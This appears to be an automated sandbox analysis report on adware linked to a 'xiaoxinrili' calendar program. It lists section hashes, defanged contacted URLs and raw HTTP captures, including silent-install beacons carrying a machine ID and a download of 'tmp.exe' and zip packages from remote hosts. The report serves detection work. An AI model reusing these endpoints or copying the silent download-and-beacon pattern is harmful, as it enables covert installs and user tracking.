.text409661740619524.430243a126e478661f20816f9d9285615f98e
.itext69632288430723.97317ba48b9b17b3dd8b92da3bd93f20ddb34
.data73728320835841.55702d7fd5f4b562d7961758f3d6a8c834fd0
.bss778242219600d41d8cd98f00b204e9800998ecf8427e
.idata102400353635843.4462593d91a2b90e60bd758fc0c4908856ae1
.tls106496800d41d8cd98f00b204e9800998ecf8427e
.rdata110592245120.141743dffc444ccc131c9dcee18db49ee6403
.rsrc11468845568455682.868953795fb89fbfecd85594d38cfa6b28bf5

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://ini.xiaoxinrili.com/ini/read.php?t=slt&d=2014123114&c=183.61.16.141
hxxp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=5467330&web_id=5467330
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=5467330&t=z
hxxp://all.cnzz.com.danuoyi.tbcache.com/c.php?id=30085361&l=3
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=30085361&l=3&t=q
hxxp://js.users.51.la/16246473.js222.187.225.125
hxxp://z.gds.cnzz.com/stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=2027361058
hxxp://count.xiaoxinrili.com/metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=inst183.61.9.244
hxxp://q.gds.cnzz.com/stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=942284497
hxxp://update.xiaoxinrili.com/ico/xiangmu2.ico183.61.9.60
hxxp://icon.ajiang.net/icon_9.gif125.46.49.200
hxxp://update.xiaoxinrili.com/tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=183.61.9.60
hxxp://www.a.shifen.com/
hxxp://update.xiaoxinrili.com/appImg/appimg.txt183.61.9.60
hxxp://update.xiaoxinrili.com/appImg/AppCloud4.2.xml183.61.9.60
hxxp://update.xiaoxinrili.com/PopBoxSmall.txt183.61.9.60
hxxp://update.xiaoxinrili.com/Version.txt183.61.9.60
hxxp://update.xiaoxinrili.com/PopBoxBig.txt183.61.9.60
hxxp://update.xiaoxinrili.com/htmlinset1.txt183.61.9.60
hxxp://update.xiaoxinrili.com/update.txt183.61.9.60
hxxp://update.xiaoxinrili.com/md5.txt183.61.9.60
hxxp://count.xiaoxinrili.com/city183.61.9.244
hxxp://update.xiaoxinrili.com/Install.txt183.61.9.60
hxxp://count.xiaoxinrili.com/metro?sid=000C29FD55AD&s=B867EF90584DBE7ADA2C745D5A27E8C6&type=silent&appname=w5DCocOQw4LDiMOVw4DDug==&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&pn=adslist&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno=183.61.9.244
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=5554906&web_id=5554906
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=5554906&t=z
hxxp://update.xiaoxinrili.com/uCalhtml.txt183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/sj.xml183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/yx.xml183.61.9.60
hxxp://update.xiaoxinrili.com/weather.txt183.61.9.60
hxxp://update.xiaoxinrili.com/qian.html?%original file name%.exe183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/tubiao.xml183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=4881483&web_id=4881483
hxxp://count.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json183.61.9.244
hxxp://update.xiaoxinrili.com/InstProtect.txt183.61.9.60
hxxp://update.xiaoxinrili.com/tj.html?%original file name%.exe183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=4878044&web_id=4878044
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=4878044&t=z
hxxp://z.gds.cnzz.com/stat.htm?id=4878044&r=&lg=en-us&ntime=none&cnzz_eid=1356438655-1421233298-&showp=1276x846&t=undefinedundefined&h=1&rnd=275871552
hxxp://cfg.pub.wandoujia.com/conn_engine_config_ini.php?ver=0&vendor=10000051160.28.208.11
hxxp://count.xiaoxinrili.com/startup?appname=5bCP5paw5pel5Y6G&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B183.61.9.244
hxxp://dl.wandoujia.com/files/conn_engine/2.69.0.5490.zip125.39.216.11
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=165878430542.120.219.171
hxxp://cnzz.mmstat.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ42.120.219.171
hxxp://360.band.glb0.ldcache.net/hezi/xxurl.html?iexplore.exe
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=1253322244
hxxp://c01.i77.rpnic.hadns.net/files/conn_engine/2.69.0.5490.zip
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=1253322244&t=z
hxxp://z.gds.cnzz.com/stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=31178880
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=129176897742.120.219.171
hxxp://360.band.glb0.ldcache.net/ico/Icon_1.ico
hxxp://update.xiaoxinrili.com/tmp.exe183.61.9.60
hxxp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe183.61.9.60
hxxp://all.cnzz.com.danuoyi.tbcache.com/stat.php?id=5614889
hxxp://all.cnzz.com.danuoyi.tbcache.com/core.php?web_id=5614889&t=z
hxxp://update.xiaoxinrili.com/FMTFilterinset.txt183.61.9.60
hxxp://z.gds.cnzz.com/stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=531066514
hxxp://count.xiaoxinrili.com/startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=00-0C-29-FD-55-AD&pos=NmFjYWQwNGJiMDM1MDFkYzkyMDc3OGVkMTJiYTZkNjM=&s=5ADBD1D5A76F0851324A6BD5DB34474B183.61.9.244
hxxp://c.cnzz.com/core.php?web_id=30085361&l=3&t=q195.27.31.246
hxxp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.5490.zip58.220.2.7
hxxp://www.baidu.com/180.76.3.151
hxxp://s19.cnzz.com/stat.php?id=4878044&web_id=48780441.99.192.16
hxxp://hzs23.cnzz.com/stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=20273610581.122.192.18
hxxp://c.cnzz.com/core.php?web_id=5554906&t=z195.27.31.246
hxxp://w.cnzz.com/c.php?id=30085361&l=31.99.192.14
hxxp://s9.cnzz.com/stat.php?id=56148891.99.192.15
hxxp://hzs10.cnzz.com/stat.htm?id=5614889&r=&lg=en-us&ntime=none&cnzz_eid=808136781-1421233891-&showp=1276x846&t=&h=1&rnd=5310665141.122.192.18
hxxp://z9.cnzz.com/stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=311788801.122.192.15
hxxp://c.cnzz.com/core.php?web_id=1253322244&t=z195.27.31.246
hxxp://hqs5.cnzz.com/stat.htm?id=30085361&r=&lg=en-us&ntime=none&cnzz_eid=162298059-1421232891-&showp=1276x846&t=&h=1&rnd=9422844971.113.192.17
hxxp://c.cnzz.com/core.php?web_id=5614889&t=z195.27.31.246
hxxp://s14.cnzz.com/stat.php?id=5554906&web_id=55549061.99.192.16
hxxp://k780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json183.61.9.244
hxxp://s19.cnzz.com/stat.php?id=4881483&web_id=48814831.99.192.16
hxxp://c.cnzz.com/core.php?web_id=4878044&t=z195.27.31.246
hxxp://dl.cdn.wandoujia.com/files/conn_engine/2.69.0.5490.zip125.39.216.11
hxxp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe202.97.174.82
hxxp://7day.xiaoxinrili.com/city183.61.9.244
hxxp://update.redshu.com/ico/xiangmu2.ico183.61.9.60
hxxp://s5.cnzz.com/stat.php?id=12533222441.99.192.15
hxxp://c.cnzz.com/core.php?web_id=5467330&t=z195.27.31.246
hxxp://down.xiaoxinrili.com/ico/Icon_1.ico202.97.174.82
hxxp://s23.cnzz.com/stat.php?id=5467330&web_id=54673301.99.192.16
web2.51.la117.21.224.131
pcookie.cnzz.com42.120.219.171
hzs19.cnzz.com1.122.192.18
hzs14.cnzz.com1.122.192.18

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /Version.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Sat, 09 Aug 2014 08:02:10 GMT

Accept-Ranges: bytes

ETag: "2ec9bb38a8b3cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:30 GMT

Content-Length: 1

0....

GET /htmlinset1.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Tue, 09 Dec 2014 01:47:57 GMT

Accept-Ranges: bytes

ETag: "79ff2c285213d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:31 GMT

Content-Length: 4

1,30HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Tue, 09 Dec 2014 01:47:57 GMT..Accept-Ranges: bytes..ETag: "79ff2c285213d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:31 GMT..Content-Length: 4..1,30....

GET /md5.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Thu, 07 Aug 2014 07:53:04 GMT

Accept-Ranges: bytes

ETag: "c1e7b39e14b2cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:31 GMT

Content-Length: 32

7CD80588C0C5215F6D688092950FE3E2HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Thu, 07 Aug 2014 07:53:04 GMT..Accept-Ranges: bytes..ETag: "c1e7b39e14b2cf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:31 GMT..Content-Length: 32..7CD80588C0C5215F6D688092950FE3E2....

GET /uCalhtml.txt HTTP/1.1

User-Agent: HOST

Host: update.xiaoxinrili.com

Cache-Control: no-cache

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Thu, 17 Apr 2014 09:26:29 GMT

Accept-Ranges: bytes

ETag: "a3115a1d1f5acf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:32 GMT

Content-Length: 34

1|1F5083874528F2BF4E8B1F075214C827HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Thu, 17 Apr 2014 09:26:29 GMT..Accept-Ranges: bytes..ETag: "a3115a1d1f5acf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:32 GMT..Content-Length: 34..1|1F5083874528F2BF4E8B1F075214C827....

GET /qian.html?%original file name%.exe HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Wed, 26 Dec 2012 10:36:08 GMT

Accept-Ranges: bytes

ETag: "d828ad154e3cd1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:34 GMT

Content-Length: 204

.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......~0.V..M....|.{......v......|...??J.ly.....>.Nv..f...=. ..~....I*@.f...HTTP/1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modified: Wed, 26 Dec 2012 10:36:08 GMT..Accept-Ranges: bytes..ETag: "d828ad154e3cd1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:34 GMT..Content-Length: 204...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......~0.V..M....|.{......v......|...??J.ly.....>.Nv..f...=. ..~....I*@.f.......

GET /weather.txt HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT

Accept-Ranges: bytes

ETag: "8ee53b69ffcf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:39 GMT

Content-Length: 38

12154|1b5d950e15ba193e96405dd75be5ab1fHTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT..Accept-Ranges: bytes..ETag: "8ee53b69ffcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:39 GMT..Content-Length: 38..12154|1b5d950e15ba193e96405dd75be5ab1f....

GET /daohang/jsq/tj.html?%original file name%.exe HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298

HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Tue, 26 Aug 2014 06:43:54 GMT

Accept-Ranges: bytes

ETag: "b6fbf11af9c0cf1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:59 GMT

Content-Length: 427

.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f.t..M.~...=.>..........].o...Vm.^...>j.w.....3..o]fu:]........jZ..g...G..]5.>J?.,.U.."_....fmQ-......H?J......../.q...wU.m..^..4[.[....Nf.eZ.>..{n.....i........p......)5.K..7A7m..g...~.A...............W...~.Y1...=5@...wh`........9$...D!CB..t....b....w........?(.N....[..."......k........M.f...9|.p....HTTP/1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modified: Tue, 26 Aug 2014 06:43:54 GMT..Accept-Ranges: bytes..ETag: "b6fbf11af9c0cf1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:59 GMT..Content-Length: 427...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f.t..M.~...=.>..........].o...Vm.^...>j.w.....3..o]fu:]........jZ..g...G..]5.>J?.,.U.."_....fmQ-......H?J......../.q...wU.m..^..4[.[....Nf.eZ.>..{n.....i........p......)5.K..7A7m..g...~.A...............W...~.Y1...=5@...wh`........9$...D!CB..t....b....w........?(.N....[..."......k........M.f...9|.p......

GET / HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0

HTTP/1.1 200 OK

Date: Wed, 14 Jan 2015 11:51:33 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Cache-Control: private

Cxy_all: baidu e60e7b6c35705ff816372734f70b6014

Expires: Wed, 14 Jan 2015 11:50:51 GMT

X-Powered-By: HPHP

Server: BWS/1.1

BDPAGETYPE: 1

BDQID: 0xa7cae7870000b576

BDUSERID: 0

Set-Cookie: BDSVRTM=0; path=/

Set-Cookie: BD_HOME=0; path=/

Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com

15092..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{

<<< skipped >>>

GET /city HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: 7day.xiaoxinrili.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:44 GMT; path=/; HttpOnly

Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:44 GMT; path=/; httponly

Cache-Control: no-cache

Date: Wed, 14 Jan 2015 11:49:44 GMT

1..1..0......

GET /city HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: 7day.xiaoxinrili.com

Connection: Keep-Alive

Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:45 GMT; path=/; httponly

Cache-Control: no-cache

Date: Wed, 14 Jan 2015 11:49:45 GMT

1..1..0......

GET /city HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: 7day.xiaoxinrili.com

Connection: Keep-Alive

Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly

Cache-Control: no-cache

Date: Wed, 14 Jan 2015 11:49:46 GMT

1..1..0......

GET /city HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: 7day.xiaoxinrili.com

Connection: Keep-Alive

Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5

HTTP/1.1 200 OK

Server: nginx/1.4.2

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly

Cache-Control: no-cache

Date: Wed, 14 Jan 2015 11:49:46 GMT

1..1..0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.17..Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:46 GMT; path=/; httponly..Cache-Control: no-cache..Date: Wed, 14 Jan 2015 11:49:46 GMT..1..1..0..

GET /core.php?web_id=5467330&t=z HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 751

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:37:38 GMT

Last-Modified: Wed, 14 Jan 2015 11:37:38 GMT

Expires: Wed, 14 Jan 2015 11:52:38 GMT

Age: 818

X-Cache: HIT TCP_MEM_HIT dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:38 GMT

X-Swift-CacheTime: 900

Via: cache4.de1[0,200-0,H], cache5.de1[1,0]

!function(){var p,q,r,a=encodeURIComponent,b="5467330",c="",d="",e="online_v3.php",f="hzs23.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 14 Jan 2015 11:37:38 GMT..Last-Modified: Wed, 14 Jan 2015 11:37:38 GMT..Expires: Wed, 14 Jan 2015 11:52:38 GMT..Age: 818..X-Cache: HIT TCP_MEM_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:38 GMT..X-Swift-CacheTime: 900..Via: cache4.de1[0,200-0,H], cache5.de1[1,0]..!function(){var p,q,r,a=encodeURIComponent,b="5467330",c="",d="",e="online_v3.php",f="hzs23.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.c

<<< skipped >>>

GET /core.php?web_id=30085361&l=3&t=q HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 750

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:37:40 GMT

Last-Modified: Wed, 14 Jan 2015 11:37:40 GMT

Expires: Wed, 14 Jan 2015 11:52:40 GMT

Age: 816

X-Cache: HIT TCP_MEM_HIT dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:40 GMT

X-Swift-CacheTime: 900

Via: cache1.de1[0,200-0,H], cache5.de1[0,0]

!function(){var p,q,r,a=encodeURIComponent,b="30085361",c="3",d="",e="online_v3.php",f="q5.cnzz.com",g="1",h="text",i="q",j="全景统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 750..Connection: keep-alive..Date: Wed, 14 Jan 2015 11:37:40 GMT..Last-Modified: Wed, 14 Jan 2015 11:37:40 GMT..Expires: Wed, 14 Jan 2015 11:52:40 GMT..Age: 816..X-Cache: HIT TCP_MEM_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:37:40 GMT..X-Swift-CacheTime: 900..Via: cache1.de1[0,200-0,H], cache5.de1[0,0]..!function(){var p,q,r,a=encodeURIComponent,b="30085361",c="3",d="",e="online_v3.php",f="q5.cnzz.com",g="1",h="text",i="q",j="全景统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="1",n=l 